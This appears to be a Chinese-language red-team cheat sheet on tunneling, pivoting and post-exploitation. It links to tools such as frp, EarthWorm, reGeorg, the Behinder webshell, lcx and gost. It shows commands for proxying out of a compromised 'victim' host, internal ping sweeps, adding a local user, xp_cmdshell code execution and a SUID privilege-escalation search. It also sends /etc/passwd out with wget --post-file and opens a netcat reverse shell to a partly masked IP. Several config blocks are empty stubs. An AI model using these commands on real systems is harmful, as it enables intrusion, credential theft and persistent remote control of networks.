一、Tools
0、工具下载地址
frp:https://diannaobos.com/frp/
proxifier:https://proxifier.soft32.com/
EarthWorm,停止更新-在commit中下载:https://github.com/rootkiter/Binary-files
冰蝎:https://github.com/rebeyond/Behinder/releases
reGeorg:https://github.com/sensepost/reGeorg
lcx下载:https://github.com/UndefinedIdentifier/LCX
gost下载:https://github.com/ginuerzh/gost
1、 frp 无域名 需要vps web-端口转发 测试成功
frpc.ini/跳板
1  | [common]  | 
frps.ini/公网服务器
1  | [common]  | 
2、frp 有域名 需要vps web-端口转发 测试成功
frpc.ini/跳板
1  | [common]  | 
frps.ini/公网服务器
1  | [common]  | 
3、frp+proxifier 需要vps socks 测试成功
frpc.ini/跳板
1  | [common]  | 
frps.ini/公网服务器
1  | [common]  | 
4、ew+proxifier 需要vps socks 测试成功
公网服务器:
1  | ew_win32.exe -s rcsocks -l 9999 -e 8888  | 
跳板:
1  | ew_win32.exe -s rssocks -d 192.168.8.98 -e 8888  | 
5、reGeorg+proxifier 无需vps 测试失败
本机
1  | reGeorgSocksProxy.py -p 9999 -u http://{{跳板ip}}/tunnel.nosocket.php  | 
跳板
1  | 上传tunnel.nosocket.php即可  | 
6、冰蝎+proxifier 无需vps 测试失败
冰蝎传马-socks转发-使用proxifier本地10086代理即可
7、lcx-端口转发 win10 需要vps 测试成功
192.168.59.133 81为内网服务
跳板
1  | Lcx.exe -slave 192.168.8.98 8888 192.168.59.133 81  | 
公网服务器
1  | Lcx.exe -listen 8888 9999  | 
访问公网服务器9999
8、gost
gost1
./gost-darwin-amd64-2.11.1 -L rtcp://:8888/localhost:8888 -F forward+ssh://admin:123456@vpsip:2222?ping=60
VPS
./gost-linux-amd64-2.11.1 -L forward+ssh://admin:123456@:2222
进行socks5代理
gost2
VICTIM
./gost2.11.2 -L=socks5://:7777
./gost2.11.2 -L rtcp://0.0.0.0:8888/localhost:7777 -F forward+ssh://admin:123456@121.40.49.4:9898?ping=60
VPS
./gost2.11.2 -L forward+ssh://admin:123456@:9898
socks5为vps:8888
gost3
victim
1  | ./gost2.11.2 -L=socks5://:7777  | 
VPS:
./gost2.11.2 -L forward+ssh://admin:123456@:9898
gost 端口转发
TCP 转发
1  | gost -L=tcp://:本地使用端口/远程服务IP:远程服务端口  | 
UDP 转发
1  | gost -L=udp://:本地使用端口/远程服务IP:远程服务端口  | 
全协议转发(TCP+UDP)
1  | gost -L=:本地使用端口/远程服务IP:远程服务端口  | 
二、Command
ps:
ping 探测内网机器存活
for /l %i in (1,1,255) do ping -n 1 -w 60 192.168.1.%i | find "TTL"
linux内网
bashcode
1  | 
  | 
run:for i in $(seq 1 255); do bash scan.sh 10.10.$i.0-255;sleep 1;cat chip.txt;done
code
1  | 
  | 
run
1  | bash 123.sh 10.10.1  | 
phpmyadmin
1  | SHOW VARIABLES LIKE '%general%'  | 
新增用户
1  | net user test test /add  | 
sqlserver rce
1  | exec master..xp_cmdshell "whoami"  | 
docker
docker中 启动所有的容器命令
1  | docker start $(docker ps -a | awk '{ print $1}' | tail -n +2)  | 
读文件
1  | wget --post-file=/etc/passwd xxxx  | 
suid提权
1  | find / -user root -perm -4000 -print 2>/dev/null  | 
压缩
1  | find ./ -type f -name '*.php' | xargs tar -zcvf /tmp/t.tar.gz  | 
反弹shell
1  | netcat 47.xxx.xxx.72 2333 -e /bin/bash  |